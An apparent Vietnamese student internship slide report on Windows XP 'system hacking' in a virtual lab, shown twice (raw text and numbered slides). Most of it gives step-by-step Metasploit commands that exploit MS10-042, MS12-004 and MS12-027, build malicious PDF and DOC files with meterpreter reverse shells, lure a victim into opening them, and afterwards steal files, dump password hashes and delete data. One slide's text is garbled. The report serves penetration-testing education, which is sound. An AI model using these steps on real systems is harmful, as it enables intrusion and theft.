BÁO CÁO THỰC TẬP SYSTEM 
HACKING 
GVHD: T . VÕ ĐỖ THẮNG 
SVTT: HUỲNH DƯƠNG KHANG
Giới thiệu 
Thực hiện 
Tổng kết
Giới thiệu 
• Theo thống kê của công ty Bkav, từ đầu năm 2013 
đến nay, tại Việt Nam đã có 2.405 website của các 
cơ quan, doanh nghiệp bị xâm nhập, trung bình 
mỗi tháng có khoảng 300 website bị tấn công 
• Hiện nay, các thiết bị như máy tính PC, laptop, 
đều có kết nối mạng nội bộ hoặc kết nối Internet . 
Trên các thiết bị này, hầu hết cài đặt các phần 
mềm ứng dụng như IE, Microsoft Office, Adobe 
Reader ,…. và chạy hệ điều hành như Windows 
XP, Windows 7…
Giới thiệu system hacking 
Gồm những kỹ thuật lấy username, password dựa vào phần 
mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều 
hành Windows 
Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông 
tin, xóa những log file hệ thống 
Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra 
những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ 
chức
Các lỗ hổng thường khai thác trong hệ điều hành 
Windows 
Như chúng ta đã biết, 
Windows là hệ điều hành 
phổ biến và được sử 
dụng rộng rãi nhất trên 
thế giới hiện nay 
Hack
1.Xuất hiện một lỗ hổng có thể bị khai thác bằng các công nghệ 
hiện có. 
2.Kẻ tấn công phát hiện lỗ hổng. 
3.Kẻ này lập tức tiến hành viết và phát tán công cụ khai thác lỗ 
hổng này. 
4.Hãng sản xuất đồng thời phát hiện lỗi và lập tức tìm cách sửa 
chữa 
5.Lỗ hổng được công bố ra ngoài 
6.Các phần mềm anti-virus được cập nhật thông tin để phát hiện 
khi có các đoạn mã tìm cách khai thác lỗ hổng này 
7.Hãng sản xuất hoàn thành bản vá 
8.Hãng hoàn tất phát hành bản vá lỗi đến tất cả khách hàng 
Các hãng sản xuất luôn cập nhật các lỗ hổng và 
đưa ra các phiên bản mới sau khi đã vá lại các lỗ 
hổng của các phiên bản trước. Và luôn theo một 
trình tự
Quá trình tấn công vào một hệ thống 
Tóm lại, quá trình tấn công 
hệ thống (System hacking) 
là bước tiếp theo sau quá 
trình khảo sát, thu thập 
thông tin của mục tiêu cần 
tấn công bằng những kỹ 
thuật như Footprinting, 
Social engineering, 
Enumeration, Google 
Hacking… đã được áp dụng 
cho mục đích truy tìm 
thông tin. 
Execute (thực thi): Thực thi ứng dụng trên hệ thống 
Enumerate (liệt kê): Trích ra tất cả những thông tin có 
thể về máy user đích. trong Chuẩn hệ thống. bị trước Sử malware, dụng phương keylogger, 
pháp 
thăm dò rootkit…SNMP để để có chạy được nó những trên máy thông tính tin tấn hữu công 
ích, 
Hide (ẩn file): Những file thực thi, file soucecode chạy 
chương trình… Cần phải được làm ẩn đi, tránh bị mục 
Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. 
chính xác hơn 
Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng 
nhập của user. Hoặc bằng một cách nào khác, mục 
Tracks (dấu vết): Tất nhiên không phải là để lại dấu 
vết. Những thông tiêu tin phát có liên hiện quan tiêu đến diệt 
bạn cần phải bị 
xóa sạch, không để lại bất cứ thứ gì. Nếu không khả 
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi 
giới tiêu hạn phải truy đạt cập tới từ là user quyền binh truy thường cập vào lên hệ admin thống 
hoặc 
năng bạn bị phát hiện là kẻ đột nhập là rất cao. 
user có quyền cao hơn đủ cho chúng ta tấn công
Giới thiệu 
Thực hiện 
Tổng kết
VMware workstation 
VMware Workstation là một phần mềm ảo hóa 
desktop mạnh mẽ dành cho các nhà phát 
triển/kiểm tra phần mềm và các chuyên gia IT 
cần chạy nhiều HĐH một lúc trên một máy PC. 
Người dùng có thể chạy các HĐH Windows, 
Linux, Netware hay Solaris x86,.. trên các máy ảo 
di động mà không cần phải khởi động lại hay 
phân vùng ổ cứng
Hệ điều hành Backtrack 5 R3 
- Backtrack là một bản phân phối dạng Live DVD của 
Linux, được phát triển để thử nghiệm xâm nhập. 
Backtrack là sự hợp nhất giữa 3 bản phân phối khác 
nhau của Linux về thâm nhập thử nghiệm IWHAX, 
WHOPPIX, và Auditor. Trong phiên bản hiện tại của 
nó (5), Backtrack được dựa trên phiên bản phân phối 
Linux Ubuntu 11.10. 
- Backtrack 5 chứa một số công cụ có thể được sử 
dụng trong quá trình thử nghiệm thâm nhập của 
chúng ta
Phần mềm Metasploit 
• Metasploit là một dự án bảo mật máy tính 
cung cấp các thông tin về vấn đề lỗ hổng bảo 
mật cũng như giúp đỡ về kiểm tra thăm nhập 
và phát triển hệ thống phát hiện tấn công 
mạng 
• Metasploit có thể chạy trên hầu hết các hệ 
điều hành: Linux, Windows, MacOS.
Sơ đồ tổng quan hệ thống mạng LAN 
Trong một mạng LAN nội bộ, 
các máy tính thường kết nối 
với nhau với khoảng cách vật lý 
gần như trong một phòng, một 
tầng, một tòa nhà, công ty, … 
Các máy tính trong mạng LAN 
có thể chia sẻ tài nguyên với 
nhau, mà điển hình là chia sẻ 
tập tin, máy in, máy quét và 
một số thiết bị khác
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ hỏng Ms10-042 
• Nhận dạng 
Lỗ hổng này có thể cho phép thực thi mã từ xa 
nếu người dùng xem một trang web thiết kế đặc 
biệt bằng cách sử dụng một trình duyệt web 
hoặc nhấp vào một liên kết thiết kế đặc biệt 
trong một thông báo e-mail
Xâm nhập và khai thác 
Windows XP 
• Thực hiện 
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole 
Từ dấu nhắc sử dụng lệnh: msf > search ms10_042 
Copy đường dẫn, enter gõ use “dán đường dẫn vào” 
Gõ show options để thấy các options của lệnh. 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
Lần lượt gõ các lệnh sau: 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD 
windows/meterpreter/reverse_tcp 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137 
msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
• Sau khi gõ lệnh exploit để khai thác lỗi ta sẽ 
thấy chương trình đưa ra cho ta 1 URL 
website, lúc này chỉ cần dụ nạn nhân nhập vào 
URL này, ta sẽ tấn công được máy nạn nhân. Ở 
đây URL là 
http://192.168.132.137:80/
Backtrack gửi mã độc qua cho máy nạn nhân
• Gõ lệnh sessions để coi Session đang thực 
hiện, ta thấy có 1 Session đang thực hiện tấn 
công tới máy 192.168.132.138 trên port 1207 
• Gõ lệnh sessions –i 1 
• Ta đã tấn công được vào máy nạn nhân, ta 
thấy máy nạn nhân là Windows XP 32 bit
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ hỏng Ms12-004 
a) Mô tả: 
Các lỗ hổng có thể cho phép thực thi mã 
từ xa nếu người dùng mở một tập tin phương 
tiện truyền thông thiết kế đặc biệt 
Một kẻ tấn công khai thác thành công lỗ 
hổng có thể lấy được quyền sử dụng giống như 
người dùng địa phương
• Cách thực hiện tấn công 
Khởi động msfconsole tử cửa sổ terminal của 
BackTrack 
> msfconsole 
Khai báo lỗ hổng sử dụng và thiết đặt options: 
> Search ms12_004 
> use exploit/windows/browser/ms12_004_midi 
> show options 
> set srvhost 192.168.192.130 
> set lhost 192.168.192.130 
> set payload windows/meterpreter/reverse_tcp 
> exploit
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ hỏng Ms12-004 
• Mô tả: 
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn 
sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho 
nạn nhân, làm thế nào để nạn nhân nhận được 
và mở file có chứa mã độc đó lên
• Thực hiện 
Mô hình: 
Cách khai thác: 
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole 
Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf 
msf > search adobe_pdf 
copy đường dẫn, ở đây ta sử dụng adobe_pdf_embedded_exe, enter gõ use “dán 
đường dẫn vào” 
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe 
Gõ lệnh show options để thấy những option của lỗi 
msf exploit(adobe_pdf_embedded_exe) > show options
Ở đây ta thấy bắt buộc 
phải tạo INFILENAME
Lần lượt gõ các lệnh: 
msf exploit(adobe_pdf_embedded_exe) > set filename 
filemadoc.pdf 
Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình 
có sẵn 1 file infilename.pdf ngoài Desktop. 
msf exploit(adobe_pdf_embedded_exe) > set 
infilename /root/Desktop/infilename.pdf 
msf exploit(adobe_pdf_embedded_exe) > set LHOST 
192.168.119.132
Địa chỉ này là địa chỉ IP của máy Hacker chính là máy 
BackTrack. 
msf exploit(adobe_pdf_embedded_exe)>set PAYLOAD 
windows/meterpreter/reverse_tcp 
msf exploit(adobe_pdf_embedded_exe) > exploit 
Ta sẽ thấy có một file filemadoc.pdf được tạo ra (đây 
chỉ là ví dụ các bạn đặt tên theo ý mình thích), ta copy 
file “filemadoc.pdf” đã được tạo ra ngoài Desktop cho 
dễ sử dụng 
msf exploit(adobe_pdf_embedded_exe) > cp 
/root/.msf4/local/filemadoc.pdf /root/Desktop
Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn 
nhân để nạn nhân chạy file này là sẽ bị dính mã độc
• Upload file “filemadoc.pdf” lên Webserver bằng cách 
đưa nó vào thư mục “/var/www” 
Start Webserver ảo bằng lệnh (mở một cửa số cmd 
khác). 
root@bt:~# service apache2 start 
Giờ ta qua máy nạn nhân truy cập vào Webserver 
ta đã dựng và tải file “filemadoc.doc” về.
Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào
• Tạo ra một trình lắng nghe 
msf exploit(adobe_pdf_embedded_exe) > use 
exploit/multi/handler 
msf exploit(handler) > set payload 
windows/meterpreter/reverse_tcp 
msf exploit(handler) >set LHOST 
192.168.119.132 
msf exploit(handler) > exploit
Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn 
nhân 
Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 
192.168.119.129:1210 
Giờ ta có thể khai thác được máy nạn nhân
Xâm nhập và khai thác 
Windows XP 
Khai thác lổ hỏng Ms12-004 
• Mô tả 
Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn 
sẽ tạo ra một file mã độc có đuôi .doc và gửi cho 
nạn nhân, làm thế nào để nạn nhân nhận được 
và mở file có chứa mã độc đó lên
• Thực hiện: 
Mô hình: 
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole 
Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf 
msf > search ms12_027 
copy đường dẫn, enter gõ use “dán đường dẫn vào” 
msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof 
Gõ lệnh show options để thấy những option của lỗi 
msf exploit(ms12_027_mscomctl_bof) > show options
Ở đây ta thấy bắt buộc phải tạo FILENAME
• Lần lượt gõ các lệnh: 
msf exploit(ms12_027_mscomctl_bof) > set filename 
filemadoc.doc 
• Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây 
chỉ là ví dụ các bạn đặt tên theo ý mình thích) 
msf exploit(ms12_027_mscomctl_bof) > set payload 
windows/meterpreter/reverse_tcp 
msf exploit(ms12_027_mscomctl_bof) > set LHOST 
192.168.119.132 
• Địa chỉ này là địa chỉ IP của máy Hacker chính là máy 
BackTrack. 
msf exploit(ms12_027_mscomctl_bof) > exploit 
• Gõ lệnh exploit để thực thi
msf exploit(ms12_027_mscomctl_bof) > cp 
/root/.msf4/local/filemadoc.doc /root/Desktop 
ta copy file “filemadoc.doc” đã được tạo ra ngoài 
Desktop cho dễ sử dụng. 
Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho 
nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc
Tấn công hệ thống sau khi tấn công 
• Xem thông tin hệ thống: 
> getuid 
>Sysinfo 
• Tải lên và đánh cắp tài liệu 
• Tải file abc.txt tại Desktop của Back Track lên ổ C 
của XP 
> upload /root/Desktop/abc.txt C:/ 
• Đánh cắp file xyz.txt tại ổ C của XP và đem về 
Desktop của Back Track 
> download C:/xyz.txt /root/Desktop
• Lấy hashpass: 
>Haskdump 
• Khám phá ổ đĩa: 
meterpreter> shell 
• Chuyển dấu nhắc sang ổ đĩa C: 
> cd c: 
• Liệt kê tài nguyên trong ổ C: 
> dir 
• Tạo thư mục abc trong ổ C: 
> md abc 
• Xóa thư mục abc trong ổ C: 
> rd abc 
• Xóa file abc.txt trong ổ C: 
> del abc.txt 
• Trở về meterpreter: 
> exit
Giới thiệu 
Thực hiện 
Tổng kết
TỔNG KẾT 
• Mật khẩu phải được đặt nhiều hơn 8 ký tự và 
phải là tổng hợp giữa chữ hoa, chữ thường, số 
và ký tự đặc biệt để các chương trình khó dò 
ra 
• Không mở tập tin đính kèm thư điện tử có 
nguồn gốc không rõ ràng hoặc không tin cậy 
• Chắc chắn rằng bạn có và đã bật hệ thống 
tường lửa cho hệ thống của mình.
Slide báo cáo: System Hacking

Slide báo cáo: System Hacking

  • 1.
    BÁO CÁO THỰCTẬP SYSTEM HACKING GVHD: T . VÕ ĐỖ THẮNG SVTT: HUỲNH DƯƠNG KHANG
  • 2.
    Giới thiệu Thựchiện Tổng kết
  • 3.
    Giới thiệu •Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công • Hiện nay, các thiết bị như máy tính PC, laptop, đều có kết nối mạng nội bộ hoặc kết nối Internet . Trên các thiết bị này, hầu hết cài đặt các phần mềm ứng dụng như IE, Microsoft Office, Adobe Reader ,…. và chạy hệ điều hành như Windows XP, Windows 7…
  • 4.
    Giới thiệu systemhacking Gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều hành Windows Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức
  • 5.
    Các lỗ hổngthường khai thác trong hệ điều hành Windows Như chúng ta đã biết, Windows là hệ điều hành phổ biến và được sử dụng rộng rãi nhất trên thế giới hiện nay Hack
  • 6.
    1.Xuất hiện mộtlỗ hổng có thể bị khai thác bằng các công nghệ hiện có. 2.Kẻ tấn công phát hiện lỗ hổng. 3.Kẻ này lập tức tiến hành viết và phát tán công cụ khai thác lỗ hổng này. 4.Hãng sản xuất đồng thời phát hiện lỗi và lập tức tìm cách sửa chữa 5.Lỗ hổng được công bố ra ngoài 6.Các phần mềm anti-virus được cập nhật thông tin để phát hiện khi có các đoạn mã tìm cách khai thác lỗ hổng này 7.Hãng sản xuất hoàn thành bản vá 8.Hãng hoàn tất phát hành bản vá lỗi đến tất cả khách hàng Các hãng sản xuất luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước. Và luôn theo một trình tự
  • 7.
    Quá trình tấncông vào một hệ thống Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin. Execute (thực thi): Thực thi ứng dụng trên hệ thống Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về máy user đích. trong Chuẩn hệ thống. bị trước Sử malware, dụng phương keylogger, pháp thăm dò rootkit…SNMP để để có chạy được nó những trên máy thông tính tin tấn hữu công ích, Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. chính xác hơn Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tiêu tin phát có liên hiện quan tiêu đến diệt bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới tiêu hạn phải truy đạt cập tới từ là user quyền binh truy thường cập vào lên hệ admin thống hoặc năng bạn bị phát hiện là kẻ đột nhập là rất cao. user có quyền cao hơn đủ cho chúng ta tấn công
  • 8.
    Giới thiệu Thựchiện Tổng kết
  • 9.
    VMware workstation VMwareWorkstation là một phần mềm ảo hóa desktop mạnh mẽ dành cho các nhà phát triển/kiểm tra phần mềm và các chuyên gia IT cần chạy nhiều HĐH một lúc trên một máy PC. Người dùng có thể chạy các HĐH Windows, Linux, Netware hay Solaris x86,.. trên các máy ảo di động mà không cần phải khởi động lại hay phân vùng ổ cứng
  • 10.
    Hệ điều hànhBacktrack 5 R3 - Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. - Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta
  • 11.
    Phần mềm Metasploit • Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng • Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.
  • 12.
    Sơ đồ tổngquan hệ thống mạng LAN Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác
  • 13.
    Xâm nhập vàkhai thác Windows XP Khai thác lổ hỏng Ms10-042 • Nhận dạng Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một thông báo e-mail
  • 14.
    Xâm nhập vàkhai thác Windows XP • Thực hiện Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh: msf > search ms10_042 Copy đường dẫn, enter gõ use “dán đường dẫn vào” Gõ show options để thấy các options của lệnh. msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options
  • 16.
    Lần lượt gõcác lệnh sau: msf exploit(ms10_042_helpctr_xss_cmd_exec) > set SRVHOST 192.168.132.137 msf exploit(ms10_042_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms10_042_helpctr_xss_cmd_exec) > set LHOST 192.168.132.137 msf exploit(ms10_042_helpctr_xss_cmd_exec) > exploit
  • 17.
    • Sau khigõ lệnh exploit để khai thác lỗi ta sẽ thấy chương trình đưa ra cho ta 1 URL website, lúc này chỉ cần dụ nạn nhân nhập vào URL này, ta sẽ tấn công được máy nạn nhân. Ở đây URL là http://192.168.132.137:80/
  • 18.
    Backtrack gửi mãđộc qua cho máy nạn nhân
  • 19.
    • Gõ lệnhsessions để coi Session đang thực hiện, ta thấy có 1 Session đang thực hiện tấn công tới máy 192.168.132.138 trên port 1207 • Gõ lệnh sessions –i 1 • Ta đã tấn công được vào máy nạn nhân, ta thấy máy nạn nhân là Windows XP 32 bit
  • 20.
    Xâm nhập vàkhai thác Windows XP Khai thác lổ hỏng Ms12-004 a) Mô tả: Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện truyền thông thiết kế đặc biệt Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử dụng giống như người dùng địa phương
  • 21.
    • Cách thựchiện tấn công Khởi động msfconsole tử cửa sổ terminal của BackTrack > msfconsole Khai báo lỗ hổng sử dụng và thiết đặt options: > Search ms12_004 > use exploit/windows/browser/ms12_004_midi > show options > set srvhost 192.168.192.130 > set lhost 192.168.192.130 > set payload windows/meterpreter/reverse_tcp > exploit
  • 22.
    Xâm nhập vàkhai thác Windows XP Khai thác lổ hỏng Ms12-004 • Mô tả: Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên
  • 23.
    • Thực hiện Mô hình: Cách khai thác: Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf msf > search adobe_pdf copy đường dẫn, ở đây ta sử dụng adobe_pdf_embedded_exe, enter gõ use “dán đường dẫn vào” msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Gõ lệnh show options để thấy những option của lỗi msf exploit(adobe_pdf_embedded_exe) > show options
  • 24.
    Ở đây tathấy bắt buộc phải tạo INFILENAME
  • 25.
    Lần lượt gõcác lệnh: msf exploit(adobe_pdf_embedded_exe) > set filename filemadoc.pdf Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình có sẵn 1 file infilename.pdf ngoài Desktop. msf exploit(adobe_pdf_embedded_exe) > set infilename /root/Desktop/infilename.pdf msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.119.132
  • 26.
    Địa chỉ nàylà địa chỉ IP của máy Hacker chính là máy BackTrack. msf exploit(adobe_pdf_embedded_exe)>set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(adobe_pdf_embedded_exe) > exploit Ta sẽ thấy có một file filemadoc.pdf được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích), ta copy file “filemadoc.pdf” đã được tạo ra ngoài Desktop cho dễ sử dụng msf exploit(adobe_pdf_embedded_exe) > cp /root/.msf4/local/filemadoc.pdf /root/Desktop
  • 27.
    Vậy là việctạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc
  • 28.
    • Upload file“filemadoc.pdf” lên Webserver bằng cách đưa nó vào thư mục “/var/www” Start Webserver ảo bằng lệnh (mở một cửa số cmd khác). root@bt:~# service apache2 start Giờ ta qua máy nạn nhân truy cập vào Webserver ta đã dựng và tải file “filemadoc.doc” về.
  • 29.
    Khi nạn nhânmở file lên thì mã độc sẽ được tiêm vào
  • 30.
    • Tạo ramột trình lắng nghe msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.119.132 msf exploit(handler) > exploit
  • 31.
    Kiểm tra máyhacker ta thấy mã độc đã được tiêm vào máy nạn nhân Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1210 Giờ ta có thể khai thác được máy nạn nhân
  • 32.
    Xâm nhập vàkhai thác Windows XP Khai thác lổ hỏng Ms12-004 • Mô tả Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên
  • 33.
    • Thực hiện: Mô hình: Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf msf > search ms12_027 copy đường dẫn, enter gõ use “dán đường dẫn vào” msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof Gõ lệnh show options để thấy những option của lỗi msf exploit(ms12_027_mscomctl_bof) > show options
  • 34.
    Ở đây tathấy bắt buộc phải tạo FILENAME
  • 35.
    • Lần lượtgõ các lệnh: msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc • Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích) msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132 • Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack. msf exploit(ms12_027_mscomctl_bof) > exploit • Gõ lệnh exploit để thực thi
  • 36.
    msf exploit(ms12_027_mscomctl_bof) >cp /root/.msf4/local/filemadoc.doc /root/Desktop ta copy file “filemadoc.doc” đã được tạo ra ngoài Desktop cho dễ sử dụng. Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc
  • 37.
    Tấn công hệthống sau khi tấn công • Xem thông tin hệ thống: > getuid >Sysinfo • Tải lên và đánh cắp tài liệu • Tải file abc.txt tại Desktop của Back Track lên ổ C của XP > upload /root/Desktop/abc.txt C:/ • Đánh cắp file xyz.txt tại ổ C của XP và đem về Desktop của Back Track > download C:/xyz.txt /root/Desktop
  • 38.
    • Lấy hashpass: >Haskdump • Khám phá ổ đĩa: meterpreter> shell • Chuyển dấu nhắc sang ổ đĩa C: > cd c: • Liệt kê tài nguyên trong ổ C: > dir • Tạo thư mục abc trong ổ C: > md abc • Xóa thư mục abc trong ổ C: > rd abc • Xóa file abc.txt trong ổ C: > del abc.txt • Trở về meterpreter: > exit
  • 39.
    Giới thiệu Thựchiện Tổng kết
  • 40.
    TỔNG KẾT •Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra • Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy • Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình.

Editor's Notes